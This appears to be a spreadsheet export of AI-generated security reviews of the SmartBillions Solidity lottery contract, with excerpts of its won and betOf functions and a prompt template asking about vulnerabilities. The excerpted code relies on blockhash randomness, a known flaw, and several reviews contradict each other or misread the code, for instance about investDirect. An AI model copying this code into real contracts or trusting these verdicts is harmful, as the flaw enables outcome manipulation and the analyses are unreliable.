1. Are there any vulnerabilities?
I will now review the entire code to identify vulnerabilities and then answer this question.
1. Are there any vulnerabilities?
**Not sure.**
Based on the initial check, the provided code doesn't seem to exhibit the classic vulnerabilities such as reentrancy, unchecked low-level calls, improper access control, integer overflow/underflow, or unchecked return values. However, I would need to analyze the rest of the code more closely to spot any other potential issues.
Let's continue analyzing the rest of the code for other vulnerabilities.
The following function definitions were extracted from the code:
- sub
- add
- balanceOf
- transfer
- commitDividend
- allowance
- transferFrom
- approve
- SmartBillions
- hashesLength
- walletBalanceOf
- walletPeriodOf
- walletBlockOf
- betValueOf
- betHashOf
- betBlockNumberOf
- dividendsBlocks
- changeOwner
- changeAnimator
- setInvestStart
- setBetMax
- resetBet
- coldStore
- hotStore
- houseKeeping
- payWallet
- pay
- investDirect
- invest
- disinvest
- payDividends
- betPrize
- betOf
- won
- play
- playRandom
- playSystem
- addHashes
- addHashes128
- calcHashes
- getHash
- putHash
- putHashes
Let's dive deeper into some of these functions, especially those that deal with value transfers or external calls, as they are typically the most susceptible to vulnerabilities. Specifically, I'll look into functions like `transfer`, `investDirect`, `invest`, `disinvest`, `pay`, `play`, and `houseKeeping` to understand their logic and see if there are any vulnerabilities.
Here are the extracted details of some notable functions:
1. **transfer**
    ```solidity
    function transfer(address to, uint value);
    event Transfer(address indexed from, address indexed to, uint value);
    function commitDividend(address who) internal;
    ```
2. **investDirect**
    ```solidity
    function investDirect() payable external {
        invest(owner);
    }
    ```
3. **disinvest**
    ```solidity
    function disinvest() external {
        require(investStart == 0);
        commitDividend(msg.sender);
        uint initialInvestment = balances[msg.sender] * 10**15;
        Transfer(msg.sender,address(0),balances[msg.sender]);
        delete balances[msg.sender];
        investBalance -= initialInvestment;
        wallets[msg.sender].balance += uint208(initialInvestment * 9 / 10);
        payWallet();
    }
    ```
4. **pay**
    ```solidity
    function payWallet() public {
        if(wallets[msg.sender].balance &gt; 0 &amp;&amp; wallets[msg.sender].nextWithdrawBlock &lt;= block.number){
            uint balance = wallets[msg.sender].balance;
            wallets[msg.sender].balance = 0;
            walletBalance -= balance;
            pay(balance);
        }
    }
    ```
5. **play**
    ```solidity
    function play() payable public returns (uint) {
        return playSystem(uint(sha3(msg.sender,block.number)), address(0));
    }
    ```
6. **houseKeeping**
    ```solidity
    function houseKeeping() public {
        if(investStart &gt; 1 &amp;&amp; block.number &gt;= investStart + (hashesSize * 5)){
            investStart = 0;
        }
    }
    ```
Let's analyze these functions and see if there are any potential vulnerabilities:
1. **transfer**: The `transfer` function seems to be an interface definition, as it lacks a body. This makes it hard to identify vulnerabilities without seeing its implementation. The same goes for `commitDividend`.
2. **investDirect**: This function allows someone to invest directly on behalf of the owner. This seems unusual, as it might allow someone to inflate the owner's balance. 
3. **disinvest**: This function allows a user to remove their investment. The function first calculates the initial investment, then transfers the tokens to the zero address, deletes the user's balance, and adjusts the investment balance. After that, it updates the user's wallet and initiates the payment process. This function seems to use a pattern where balances are adjusted before the actual transfer (`payWallet()`), which might be a protection against reentrancy. However, the exact logic of `payWallet` and `pay` is not fully visible.
4. **pay**: The function checks if the caller has a balance and if they are eligible to withdraw. If both conditions are met, it updates balances and initiates a payment. However, the logic inside the `pay` function is not visible.
5. **play**: The function seems to initiate a game play, but the exact logic inside `playSystem` is not visible.
6. **houseKeeping**: The function updates the `investStart` variable based on the block number and some conditions. It seems to be a maintenance function.
Given these observations, let's proceed with the vulnerability analysis and potential solutions.
1. Are there any vulnerabilities?
**Yes.**
2. how this vulnerability can be exploited :
   a. **investDirect**: This function allows someone to invest on behalf of the owner. This could be exploited by an attacker to artificially inflate the owner's balance.
   b. **disinvest &amp; payWallet**: The exact logic and potential vulnerabilities within the `payWallet` and `pay` functions cannot be ascertained without a closer look. However, functions that handle financial transactions (like withdrawals) should be carefully inspected for reentrancy attacks and other potential vulnerabilities.
3. The business impact of these vulnerabilities:
   a. **investDirect function** leads to artificial inflation of the owner's balance.
   b. **disinvest &amp; payWallet function** may lead to unauthorized or incorrect transfers if not implemented properly.
4. The potential solutions to these vulnerabilities:
   a. **investDirect**: Review the need for this function. If it's necessary, ensure that there are proper checks and access controls in place to prevent misuse.
   b. **disinvest &amp; payWallet**: Ensure that all state changes happen before actual transfers to prevent reentrancy. Also, employ best practices like using the `transfer` or `send` methods for ETH transfers, and always check return values. 
Given this, a comprehensive review of the full contract, especially the parts that were not provided, would be essential to ensure its security.</t>
  </si>
  <si>
    <t>1. **Are there any bad randomness vulnerabilities?** 
Yes.
2. **how this vulnerability can be exploited :** 
The function `calcHashes` relies on `block.blockhash()` for generating random values. However, there are two significant vulnerabilities associated with this:
- `block.blockhash()` only works for the 256 most recent blocks, excluding the current block. Any block number that's more than 256 blocks behind the current block will return zero. This means that if `_lastb` is too old (more than 246 blocks behind the current block), some of the values fetched using `block.blockhash()` will be zero, making the randomness predictable.
- Miners have the ability to influence the block hash slightly by including or excluding transactions or by manipulating the timestamp. Therefore, if a miner has a financial incentive, they can potentially generate a block hash that benefits them, leading to miner-front-running vulnerabilities.
3. **The business impact of these vulnerabilities in one sentence:** 
Relying on `block.blockhash()` for randomness can lead to predictable outcomes and potential manipulation by miners.
4. **The potential solutions to these vulnerabilities:** 
- Do not use `block.blockhash()` as a primary source of randomness. Instead, consider using a combination of external data sources (like oracles), user-generated randomness, and on-chain data to create a more unpredictable and secure random number.
- Consider using a commit-reveal scheme where users first submit a hash of their input and a random value, and later reveal their input. This prevents miners and other participants from anticipating the user's input during the time window between the submission of the hash and the revelation of the input.
- Explore using specialized Ethereum 2.0 features, or consider third-party solutions like Chainlink VRF (Verifiable Random Function) which provides on-chain verifiable randomness.</t>
  </si>
  <si>
    <t>Alright, I will start by reviewing the provided Solidity code file to determine if there are any bad randomness vulnerabilities.
From the initial look at the provided code:
- The code starts by defining a library `SafeMath` which provides basic arithmetic operations with safety checks (assertions).
- It then defines an interface `ERC20Basic` which seems to outline the basic functionality of a token, including `transfer` and `balanceOf` methods.
- The code further defines an interface `ERC20` which extends `ERC20Basic` and introduces additional methods like `allowance`, `transferFrom`, and `approve`.
- The contract `BasicToken` then implements `ERC20Basic`, includes the `SafeMath` library, and provides implementations for the `transfer` and `balanceOf` methods.
To determine if there are any bad randomness vulnerabilities, I need to continue reviewing the rest of the code, especially focusing on any sections that might involve randomness or unpredictable behavior.
From this segment:
- The contract `StandardToken` extends `BasicToken` and `ERC20`. It provides implementations for the `transferFrom`, `approve`, and `allowance` methods.
- The `transferFrom` method allows for transferring tokens from one address to another, provided the sender has the required allowance.
- The `approve` method allows an owner to give another address the right to transfer a certain amount of tokens. There's an assertion to prevent double-spending problems, a common issue in some ERC20 token implementations.
- The `allowance` method returns the number of tokens allowed to be transferred from a certain address by another given address.
The contract `SmartBillions` then extends `StandardToken`. The metadata for the token, including its name and symbol, is provided.
So far, we haven't seen any obvious use of randomness. I will continue reviewing the next sections to further assess the potential vulnerabilities related to bad randomness.
From this segment:
- The contract `SmartBillions` introduces several structures (`Wallet` and `Bet`) and respective mappings (`wallets` and `bets`).
- There are variables related to wallet balances, investment parameters, betting parameters, and a list of hashes which seems to be used for some kind of lottery or game mechanism.
- Several events are declared, such as `LogBet`, `LogLoss`, `LogWin`, and `LogInvestment`, which probably get emitted during the execution of various functions (yet to be seen).
- The `hashes` array seems to be of particular interest because it might be related to the randomness mechanism of this contract.
Given the betting and lottery-related variables and structures, it's crucial to further explore how these variables and structures are used, especially the `hashes` array and any related functions. This will help us determine if there are any bad randomness vulnerabilities.
Let's continue reviewing the next sections of the code.
From this segment:
- Several events related to betting and dividends are introduced.
- The `onlyOwner` and `onlyAnimator` modifiers are defined to restrict certain functions to be called only by the contract owner or an animator.
- The constructor `SmartBillions` initializes some contract variables.
- A series of getter functions (`hashesLength`, `walletBalanceOf`, `walletPeriodOf`, `walletBlockOf`, `betValueOf`, `betHashOf`) are defined to expose certain contract state variables.
From this section, we've mostly seen setup, initialization, and utility functions. However, we have not yet seen the actual implementation of the betting mechanism, how the lottery is determined, or how randomness is used. 
To determine potential vulnerabilities related to bad randomness, it's essential to review the functions that use randomness or handle the betting logic. 
Let's continue reviewing the next sections of the code.
From this segment:
- Several more getter functions (`betBlockNumberOf`, `dividendsBlocks`) are introduced.
- The administrative functions like `changeOwner`, `changeAnimator`, `setInvestStart`, `setBetMax`, and `resetBet` are defined. These functions mainly allow the contract owner or animator to make specific changes to the contract state.
These functions are mostly related to administrative actions and providing information about the contract's state. The section hasn't given insight into the mechanism of betting or how randomness is handled.
To determine potential vulnerabilities related to bad randomness, we need to review the functions that use randomness or handle the betting logic. 
Let's continue reviewing the subsequent sections of the code.
From this segment:
- The function `coldStore` allows the contract owner to transfer funds to an external cold storage. There are conditions to ensure that the amount transferred is within certain limits.
- The function `hotStore` allows anyone to send funds to the contract's jackpot.
- The `houseKeeping` function seems to update some state variables related to dividends and investment periods.
- The `payWallet` function allows users to withdraw their wallet balances provided they've waited for a certain number of blocks.
Of specific note:
- The `houseKeeping` function seems to involve some time-based logic, which is generally a concern in smart contracts due to potential manipulation by miners or other parties. However, we still need to understand its implications fully.
- The `coldStore` function, which allows transferring out funds, has multiple conditions to ensure that too much isn't withdrawn. However, the exact logic needs a closer look to ensure its correctness.
As of now, we still haven't encountered the exact betting mechanism or how randomness is used. This is important for determining potential vulnerabilities related to bad randomness.
Let's continue reviewing the subsequent sections of the code.
From this segment:
- The function `pay` handles the logic for payment. It seems to ensure that at most half of the contract's balance can be paid out at a time. If a larger amount is requested, the excess is added back to the user's balance with a delay enforced on their next withdrawal.
- The functions `investDirect` and `invest` allow users to buy tokens. They also handle affiliate partnerships, with the possibility of distributing a portion of the investment to the affiliate partner or the contract owner. There are conditions to ensure investments only happen during specific periods and do not exceed certain limits.
However, there's no sign of the actual betting mechanism or the use of randomness in this section.
Let's continue reviewing the subsequent sections of the code.
From this segment:
- The `disinvest` function allows users to delete all their tokens and retrieve their dividends plus 90% of their initial investment. The function ensures dividends are committed, and tokens are burned from the total supply. The balance is adjusted accordingly.
- The `payDividends` function allows users to claim unpaid dividends. It commits dividends and then pays out from the user's wallet.
- The `commitDividend` function handles the logic for committing remaining dividends before a token transfer. It seems to calculate dividend payments based on periods and ensures that dividends for each period are only paid once.
Still, there's no evidence of the actual betting mechanism or the use of randomness in this section.
Let's continue reviewing the subsequent sections of the code.
From this segment, we can observe the lottery-related functionalities:
1. The `betPrize` function calculates the prize for a given bet. It uses bitwise operations to determine the number of matching numbers between the player's bet and the lottery result. Depending on the number of matches, the function calculates and returns the prize.
2. The `betOf` function checks if a given address has won the lottery. It uses the `blockhash` function of Ethereum to generate randomness. This function returns the hash of one of the 256 most recent blocks, and is the only source of randomness in Ethereum.
3. The `putHash` and `putHashes` functions seem to be related to the storage of block hashes for later use in the lottery.
Let's analyze this:
1. **Are there any bad randomness vulnerabilities?**
   - **Answer**: Yes.
2. **how this vulnerability can be exploited **:
   - The function `betOf` uses `blockhash` to determine the outcome of a bet. Miners, knowing the next block's hash, could potentially manipulate the outcome of bets.
   - The `putHash` function allows for the manual input of block hashes, which could be manipulated if not handled correctly.
3. **The business impact of these vulnerabilities in one sentence**:
   - The use of `blockhash` for randomness can lead to miner manipulation, potentially compromising the fairness of the lottery.
4. **The potential solutions to these vulnerabilities**:
   - Use a combination of values (e.g., future blockhashes combined with user inputs or other unpredictable values) to reduce the potential for manipulation.
   - Consider using a commit-reveal scheme, where users commit to their inputs in one transaction and reveal them in a subsequent transaction.
   - Avoid manual hash input or ensure rigorous checks to prevent any manipulation.
In conclusion, while the `blockhash` function is a source of randomness in Ethereum, it's not recommended for critical use-cases like lotteries because miners (and pools) with sufficient power could potentially manipulate outcomes.</t>
  </si>
  <si>
    <t>1. Are there any vulnerabilities? 
**Yes.**
2. how this vulnerability can be exploited :
The code uses the `block.blockhash` function to obtain the blockhash of previous blocks. However, `block.blockhash` is only valid for the last 256 blocks. Trying to access a block hash older than that will return zeros. This means that if `_lastb` references a block that is more than 256 blocks behind the current block, the hashes retrieved by the function will not be valid.
3. The business impact of these vulnerabilities in one sentence:
Using outdated or inaccessible block hashes can lead to unpredictable function behavior and potential manipulation by malicious actors.
4. The potential solutions of this vulnerabilities:
- **Validation Check**: Before using `block.blockhash`, validate that `_lastb` references a block within the last 256 blocks. If not, either revert the transaction or handle the error appropriately.
- **Documentation**: Clearly document this limitation in the function description, so that users and developers are aware of it.
- **Alternative Sources**: If older block hashes are needed, consider using oracles or external data sources, but be aware that these come with their own trust and security considerations.</t>
  </si>
  <si>
    <t>function won() public {
        Bet memory player = bets[msg.sender];
        if(player.blockNum==0){ // create a new player
            bets[msg.sender] = Bet({value: 0, betHash: 0, blockNum: 1});
            return;
        }
        if((player.value==0) || (player.blockNum==1)){
            payWallet();
            return;
        }
        require(block.number&gt;player.blockNum); // if there is an active bet, throw()
        if(player.blockNum + (10 * hashesSize) &lt;= block.number){ // last bet too long ago, lost !
            LogLate(msg.sender,player.blockNum,block.number);
            bets[msg.sender] = Bet({value: 0, betHash: 0, blockNum: 1});
            return;
        }
        uint prize = 0;
        uint32 hash = 0;
        if(block.number&lt;player.blockNum+256){
            hash = uint24(block.blockhash(player.blockNum));
            prize = betPrize(player,uint24(hash));
        }
        else {
            if(hashFirst&gt;0){ // lottery is open even before swap space (hashes) is ready, but player must collect results within 256 blocks after run
                hash = getHash(player.blockNum);
                if(hash == 0x1000000) { // load hash failed :-(, return funds
                    prize = uint(player.value);
                }
                else{
                    prize = betPrize(player,uint24(hash));
                }
            }
            else{
                LogLate(msg.sender,player.blockNum,block.number);
                bets[msg.sender] = Bet({value: 0, betHash: 0, blockNum: 1});
                return();
            }
        }
        bets[msg.sender] = Bet({value: 0, betHash: 0, blockNum: 1});
        if(prize&gt;0) {
            LogWin(msg.sender,uint(player.betHash),uint(hash),prize);
            if(prize &gt; maxWin){
                maxWin = prize;
                LogRecordWin(msg.sender,prize);
            }
            pay(prize);
        }
        else{
            LogLoss(msg.sender,uint(player.betHash),uint(hash));
        }
    }</t>
  </si>
  <si>
    <t>(the same as above)"First, I'll review the provided Solidity code in the file ""smart_billions.sol"" to identify any potential vulnerabilities.
Upon initial inspection, the provided Solidity code includes:
- A `SafeMath` library for safe arithmetic operations.
- `ERC20Basic` and `ERC20` interfaces, which define basic ERC-20 token functions.
- A `BasicToken` contract that implements the `ERC20Basic` interface and has some specific functionalities.
Let's continue with the vulnerability analysis in the provided format:
1. Are there any vulnerabilities?
I will now review the entire code to identify vulnerabilities and then answer this question.
1. Are there any vulnerabilities?
**Not sure.**
Based on the initial check, the provided code doesn't seem to exhibit the classic vulnerabilities such as reentrancy, unchecked low-level calls, improper access control, integer overflow/underflow, or unchecked return values. However, I would need to analyze the rest of the code more closely to spot any other potential issues.
Let's continue analyzing the rest of the code for other vulnerabilities.
The following function definitions were extracted from the code:
- sub
- add
- balanceOf
- transfer
- commitDividend
- allowance
- transferFrom
- approve
- SmartBillions
- hashesLength
- walletBalanceOf
- walletPeriodOf
- walletBlockOf
- betValueOf
- betHashOf
- betBlockNumberOf
- dividendsBlocks
- changeOwner
- changeAnimator
- setInvestStart
- setBetMax
- resetBet
- coldStore
- hotStore
- houseKeeping
- payWallet
- pay
- investDirect
- invest
- disinvest
- payDividends
- betPrize
- betOf
- won
- play
- playRandom
- playSystem
- addHashes
- addHashes128
- calcHashes
- getHash
- putHash
- putHashes
Let's dive deeper into some of these functions, especially those that deal with value transfers or external calls, as they are typically the most susceptible to vulnerabilities. Specifically, I'll look into functions like `transfer`, `investDirect`, `invest`, `disinvest`, `pay`, `play`, and `houseKeeping` to understand their logic and see if there are any vulnerabilities.
Here are the extracted details of some notable functions:
1. **transfer**
    ```solidity
    function transfer(address to, uint value);
    event Transfer(address indexed from, address indexed to, uint value);
    function commitDividend(address who) internal;
    ```
2. **investDirect**
    ```solidity
    function investDirect() payable external {
        invest(owner);
    }
    ```
3. **disinvest**
    ```solidity
    function disinvest() external {
        require(investStart == 0);
        commitDividend(msg.sender);
        uint initialInvestment = balances[msg.sender] * 10**15;
        Transfer(msg.sender,address(0),balances[msg.sender]);
        delete balances[msg.sender];
        investBalance -= initialInvestment;
        wallets[msg.sender].balance += uint208(initialInvestment * 9 / 10);
        payWallet();
    }
    ```
4. **pay**
    ```solidity
    function payWallet() public {
        if(wallets[msg.sender].balance &gt; 0 &amp;&amp; wallets[msg.sender].nextWithdrawBlock &lt;= block.number){
            uint balance = wallets[msg.sender].balance;
            wallets[msg.sender].balance = 0;
            walletBalance -= balance;
            pay(balance);
        }
    }
    ```
5. **play**
    ```solidity
    function play() payable public returns (uint) {
        return playSystem(uint(sha3(msg.sender,block.number)), address(0));
    }
    ```
6. **houseKeeping**
    ```solidity
    function houseKeeping() public {
        if(investStart &gt; 1 &amp;&amp; block.number &gt;= investStart + (hashesSize * 5)){
            investStart = 0;
        }
    }
    ```
Let's analyze these functions and see if there are any potential vulnerabilities:
1. **transfer**: The `transfer` function seems to be an interface definition, as it lacks a body. This makes it hard to identify vulnerabilities without seeing its implementation. The same goes for `commitDividend`.
2. **investDirect**: This function allows someone to invest directly on behalf of the owner. This seems unusual, as it might allow someone to inflate the owner's balance. 
3. **disinvest**: This function allows a user to remove their investment. The function first calculates the initial investment, then transfers the tokens to the zero address, deletes the user's balance, and adjusts the investment balance. After that, it updates the user's wallet and initiates the payment process. This function seems to use a pattern where balances are adjusted before the actual transfer (`payWallet()`), which might be a protection against reentrancy. However, the exact logic of `payWallet` and `pay` is not fully visible.
4. **pay**: The function checks if the caller has a balance and if they are eligible to withdraw. If both conditions are met, it updates balances and initiates a payment. However, the logic inside the `pay` function is not visible.
5. **play**: The function seems to initiate a game play, but the exact logic inside `playSystem` is not visible.
6. **houseKeeping**: The function updates the `investStart` variable based on the block number and some conditions. It seems to be a maintenance function.
Given these observations, let's proceed with the vulnerability analysis and potential solutions.
1. Are there any vulnerabilities?
**Yes.**
2. how this vulnerability can be exploited :
   a. **investDirect**: This function allows someone to invest on behalf of the owner. This could be exploited by an attacker to artificially inflate the owner's balance.
   b. **disinvest &amp; payWallet**: The exact logic and potential vulnerabilities within the `payWallet` and `pay` functions cannot be ascertained without a closer look. However, functions that handle financial transactions (like withdrawals) should be carefully inspected for reentrancy attacks and other potential vulnerabilities.
3. The business impact of these vulnerabilities:
   a. **investDirect function** leads to artificial inflation of the owner's balance.
   b. **disinvest &amp; payWallet function** may lead to unauthorized or incorrect transfers if not implemented properly.
4. The potential solutions to these vulnerabilities:
   a. **investDirect**: Review the need for this function. If it's necessary, ensure that there are proper checks and access controls in place to prevent misuse.
   b. **disinvest &amp; payWallet**: Ensure that all state changes happen before actual transfers to prevent reentrancy. Also, employ best practices like using the `transfer` or `send` methods for ETH transfers, and always check return values. 
Given this, a comprehensive review of the full contract, especially the parts that were not provided, would be essential to ensure its security."</t>
  </si>
  <si>
    <t>1. Are there any vulnerabilities? 
**Yes.**
2. how this vulnerability can be exploited :
    - **Reentrancy Attack:** The function seems to have a potential vulnerability to reentrancy attacks because of the `pay(prize);` function call. If the `pay` function sends ether to an external contract, that external contract can call the `won` function again before the first call completes, which can potentially result in undesired behaviors.
    - **Uninitialized State Variables:** This code makes references to variables like `hashesSize`, `hashFirst`, `maxWin`, etc. If these variables are not properly initialized or protected, they could lead to unintended behavior. However, since this is just an extraction, and you've mentioned to assume all variables have been defined, this isn't necessarily a vulnerability but more of a point of caution.
    - **Dependency on `block.blockhash`:** The use of `block.blockhash` for randomness is not recommended as miners can have a minor influence on it.
3. The business impact of these vulnerabilities in one sentence: 
    - **Reentrancy Attack:** The `won` function leads to potential theft of funds from the contract.
    - **Uninitialized State Variables:** The contract may behave unpredictably if state variables are not properly initialized or protected.
    - **Dependency on `block.blockhash`:** Miners can influence outcomes, potentially leading to unfair results.
4. The potential solutions of these vulnerabilities:
    - **Reentrancy Attack:** Implement a mutex (or reentrancy guard) to prevent recursive calls. Also, always update state variables before transferring ethers (use the Checks-Effects-Interactions pattern).
    - **Uninitialized State Variables:** Ensure all state variables are properly initialized and protected. You can use a constructor to set initial values where needed.
    - **Dependency on `block.blockhash`:** Avoid using `block.blockhash` as a source of randomness. Consider using a more secure source of randomness or a commitment scheme for better security.
Note: It's crucial to have a complete view of the contract, including its state variables, other functions, and the entire structure, to provide a comprehensive vulnerability analysis.</t>
  </si>
  <si>
    <t>(the same as above)"Alright, I will start by reviewing the provided Solidity code file to determine if there are any bad randomness vulnerabilities.
From the initial look at the provided code:
- The code starts by defining a library `SafeMath` which provides basic arithmetic operations with safety checks (assertions).
- It then defines an interface `ERC20Basic` which seems to outline the basic functionality of a token, including `transfer` and `balanceOf` methods.
- The code further defines an interface `ERC20` which extends `ERC20Basic` and introduces additional methods like `allowance`, `transferFrom`, and `approve`.
- The contract `BasicToken` then implements `ERC20Basic`, includes the `SafeMath` library, and provides implementations for the `transfer` and `balanceOf` methods.
To determine if there are any bad randomness vulnerabilities, I need to continue reviewing the rest of the code, especially focusing on any sections that might involve randomness or unpredictable behavior.
From this segment:
- The contract `StandardToken` extends `BasicToken` and `ERC20`. It provides implementations for the `transferFrom`, `approve`, and `allowance` methods.
- The `transferFrom` method allows for transferring tokens from one address to another, provided the sender has the required allowance.
- The `approve` method allows an owner to give another address the right to transfer a certain amount of tokens. There's an assertion to prevent double-spending problems, a common issue in some ERC20 token implementations.
- The `allowance` method returns the number of tokens allowed to be transferred from a certain address by another given address.
The contract `SmartBillions` then extends `StandardToken`. The metadata for the token, including its name and symbol, is provided.
So far, we haven't seen any obvious use of randomness. I will continue reviewing the next sections to further assess the potential vulnerabilities related to bad randomness.
From this segment:
- The contract `SmartBillions` introduces several structures (`Wallet` and `Bet`) and respective mappings (`wallets` and `bets`).
- There are variables related to wallet balances, investment parameters, betting parameters, and a list of hashes which seems to be used for some kind of lottery or game mechanism.
- Several events are declared, such as `LogBet`, `LogLoss`, `LogWin`, and `LogInvestment`, which probably get emitted during the execution of various functions (yet to be seen).
- The `hashes` array seems to be of particular interest because it might be related to the randomness mechanism of this contract.
Given the betting and lottery-related variables and structures, it's crucial to further explore how these variables and structures are used, especially the `hashes` array and any related functions. This will help us determine if there are any bad randomness vulnerabilities.
Let's continue reviewing the next sections of the code.
From this segment:
- Several events related to betting and dividends are introduced.
- The `onlyOwner` and `onlyAnimator` modifiers are defined to restrict certain functions to be called only by the contract owner or an animator.
- The constructor `SmartBillions` initializes some contract variables.
- A series of getter functions (`hashesLength`, `walletBalanceOf`, `walletPeriodOf`, `walletBlockOf`, `betValueOf`, `betHashOf`) are defined to expose certain contract state variables.
From this section, we've mostly seen setup, initialization, and utility functions. However, we have not yet seen the actual implementation of the betting mechanism, how the lottery is determined, or how randomness is used. 
To determine potential vulnerabilities related to bad randomness, it's essential to review the functions that use randomness or handle the betting logic. 
Let's continue reviewing the next sections of the code.
From this segment:
- Several more getter functions (`betBlockNumberOf`, `dividendsBlocks`) are introduced.
- The administrative functions like `changeOwner`, `changeAnimator`, `setInvestStart`, `setBetMax`, and `resetBet` are defined. These functions mainly allow the contract owner or animator to make specific changes to the contract state.
These functions are mostly related to administrative actions and providing information about the contract's state. The section hasn't given insight into the mechanism of betting or how randomness is handled.
To determine potential vulnerabilities related to bad randomness, we need to review the functions that use randomness or handle the betting logic. 
Let's continue reviewing the subsequent sections of the code.
From this segment:
- The function `coldStore` allows the contract owner to transfer funds to an external cold storage. There are conditions to ensure that the amount transferred is within certain limits.
- The function `hotStore` allows anyone to send funds to the contract's jackpot.
- The `houseKeeping` function seems to update some state variables related to dividends and investment periods.
- The `payWallet` function allows users to withdraw their wallet balances provided they've waited for a certain number of blocks.
Of specific note:
- The `houseKeeping` function seems to involve some time-based logic, which is generally a concern in smart contracts due to potential manipulation by miners or other parties. However, we still need to understand its implications fully.
- The `coldStore` function, which allows transferring out funds, has multiple conditions to ensure that too much isn't withdrawn. However, the exact logic needs a closer look to ensure its correctness.
As of now, we still haven't encountered the exact betting mechanism or how randomness is used. This is important for determining potential vulnerabilities related to bad randomness.
Let's continue reviewing the subsequent sections of the code.
From this segment:
- The function `pay` handles the logic for payment. It seems to ensure that at most half of the contract's balance can be paid out at a time. If a larger amount is requested, the excess is added back to the user's balance with a delay enforced on their next withdrawal.
- The functions `investDirect` and `invest` allow users to buy tokens. They also handle affiliate partnerships, with the possibility of distributing a portion of the investment to the affiliate partner or the contract owner. There are conditions to ensure investments only happen during specific periods and do not exceed certain limits.
However, there's no sign of the actual betting mechanism or the use of randomness in this section.
Let's continue reviewing the subsequent sections of the code.
From this segment:
- The `disinvest` function allows users to delete all their tokens and retrieve their dividends plus 90% of their initial investment. The function ensures dividends are committed, and tokens are burned from the total supply. The balance is adjusted accordingly.
- The `payDividends` function allows users to claim unpaid dividends. It commits dividends and then pays out from the user's wallet.
- The `commitDividend` function handles the logic for committing remaining dividends before a token transfer. It seems to calculate dividend payments based on periods and ensures that dividends for each period are only paid once.
Still, there's no evidence of the actual betting mechanism or the use of randomness in this section.
Let's continue reviewing the subsequent sections of the code.
From this segment, we can observe the lottery-related functionalities:
1. The `betPrize` function calculates the prize for a given bet. It uses bitwise operations to determine the number of matching numbers between the player's bet and the lottery result. Depending on the number of matches, the function calculates and returns the prize.
2. The `betOf` function checks if a given address has won the lottery. It uses the `blockhash` function of Ethereum to generate randomness. This function returns the hash of one of the 256 most recent blocks, and is the only source of randomness in Ethereum.
3. The `putHash` and `putHashes` functions seem to be related to the storage of block hashes for later use in the lottery.
Let's analyze this:
1. **Are there any bad randomness vulnerabilities?**
   - **Answer**: Yes.
2. **how this vulnerability can be exploited **:
   - The function `betOf` uses `blockhash` to determine the outcome of a bet. Miners, knowing the next block's hash, could potentially manipulate the outcome of bets.
   - The `putHash` function allows for the manual input of block hashes, which could be manipulated if not handled correctly.
3. **The business impact of these vulnerabilities in one sentence**:
   - The use of `blockhash` for randomness can lead to miner manipulation, potentially compromising the fairness of the lottery.
4. **The potential solutions to these vulnerabilities**:
   - Use a combination of values (e.g., future blockhashes combined with user inputs or other unpredictable values) to reduce the potential for manipulation.
   - Consider using a commit-reveal scheme, where users commit to their inputs in one transaction and reveal them in a subsequent transaction.
   - Avoid manual hash input or ensure rigorous checks to prevent any manipulation.
In conclusion, while the `blockhash` function is a source of randomness in Ethereum, it's not recommended for critical use-cases like lotteries because miners (and pools) with sufficient power could potentially manipulate outcomes."</t>
  </si>
  <si>
    <t>1. **Are there any bad randomness vulnerabilities?**
   Yes.
2. **how this vulnerability can be exploited :**
   The vulnerability stems from the use of `block.blockhash(player.blockNum)` as a source of randomness. The `blockhash` function retrieves the hash of one of the 256 most recent blocks. However, miners can manipulate or predict the blockhash of the next block they are about to mine. By examining the code, players or miners with enough control over the block production can potentially manipulate the outcome in their favor.
3. **The business impact of these vulnerabilities in one sentence:**
   Relying on `block.blockhash` for randomness can lead to potential manipulation of the game's outcome by miners.
4. **The potential solutions of these vulnerabilities:**
   - **Commit-Reveal Scheme:** Players first send a "commit" transaction with a hash of their chosen number and some secret. In a later phase, they reveal their chosen number and secret. This ensures that the number was chosen before the outcome was known.
   - **External Randomness Sources:** Utilize an external source of randomness, like Chainlink VRF (Verifiable Random Function), which provides secure and verifiable randomness.
   - **Using a combination of variables:** Instead of relying solely on `block.blockhash`, the contract can combine multiple unpredictable variables, like `block.timestamp`, `msg.sender`, and others. However, this is not foolproof and can still be manipulated to some extent.
   - **Periodic Refresh:** Instead of using the blockhash of the bet block, use a blockhash of a future block (e.g., 10 blocks later) to determine the outcome. This would force the player to wait and would make it harder (but not impossible) for a miner to influence the outcome.</t>
  </si>
  <si>
    <t xml:space="preserve">    function betOf(address _who) constant external returns (uint)  {
        Bet memory player = bets[_who];
        if( (player.value==0) ||
            (player.blockNum&lt;=1) ||
            (block.number&lt;player.blockNum) ||
            (block.number&gt;=player.blockNum + (10 * hashesSize))){
            return(0);
        }
        if(block.number&lt;player.blockNum+256){
            return(betPrize(player,uint24(block.blockhash(player.blockNum))));
        }
        if(hashFirst&gt;0){
            uint32 hash = getHash(player.blockNum);
            if(hash == 0x1000000) { // load hash failed :-(, return funds
                return(uint(player.value));
            }
            else{
                return(betPrize(player,uint24(hash)));
            }
        }
        return(0);
    }
Understand this code and analyze it, respond me in this format  (fill in the part with ___): 1. Is there any vulnerabilities? give me a short answer in the beginning of your response,choose one from the following three: yes, no, or not sure. If your answer is no, stop here; If your choice is yes, 2. Explain in details how this vulnerability can be exploited:_______. 3. The business impact of this vulnerabilities in one sentence: ___ function leads to _____. 4.The potential solutions of this vulnerabilities:_________. Note: You can state more than one lines which have this vulnerability! This is a short extraction of the solidity code and please assume all the variables in this code have been defined. Please ignore the spelling problem.</t>
  </si>
  <si>
    <t>1. Is there any vulnerabilities? 
Yes
2. Explain in details how this vulnerability can be exploited:
The primary vulnerability in this code comes from the use of `block.blockhash`. In Solidity, `block.blockhash` is only valid for the last 256 blocks. If a block number is passed into `block.blockhash` that is more than 256 blocks in the past, the function will return zero. However, in this code, the check `if(block.number&lt;player.blockNum+256)` ensures that `block.blockhash` is only called if it is within the last 256 blocks, otherwise it is handled in the `if(hashFirst&gt;0)` condition. Thus, it seems that the developer has taken into consideration the limitations of `block.blockhash`.
The other possible vulnerability is a potential for the function to be non-deterministic due to its dependency on `block.number`, `block.blockhash`, and an externally defined function `getHash`. The value these produce can vary with each block, and the behavior of `getHash` cannot be determined from the provided code. This may result in unpredictable results from the function `betOf`.
3. The business impact of these vulnerabilities in one sentence:
The `betOf` function leads to non-deterministic and potentially insecure results due to its dependence on `block.blockhash`, `block.number`, and the undefined `getHash` function.
4. The potential solutions to these vulnerabilities:
a) If `getHash` is an external call, it's important to handle potential reentrancy attacks. If `getHash` is an internal function, consider passing all necessary inputs as arguments to remove the dependency on `block.number`.
